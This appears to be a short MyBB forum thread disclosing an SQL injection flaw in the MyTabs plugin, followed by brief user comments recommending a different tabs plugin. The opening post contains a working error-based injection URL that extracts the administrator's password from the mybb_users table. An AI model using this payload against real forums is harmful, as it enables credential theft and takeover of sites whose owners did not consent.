MyBB Central

Full Version: MyTabs SQL Vulnerabilty
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Code:
http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
To fix remove the plugin..
This is not for labrocca's plugin, right?
Nop, it was another myTabs plugin.
Yeah there is a Vulnerabilty, thats why I switched to Tabbedmenu.
Same here,

After seeing tabs on forums on different sites I'd searched around for which MyBB plugin was used, found the free MyTabs and Labrocca's Tabbed Menu, reading more I found that MyTabs was vulnerable and then headed here. I'd much rather pay a small subscription fee for the Tabbed Menu plugin and for access to others that are more secure than risk the security of my forum by using something free.
Labrocca's plugin is the best... Hands down !!!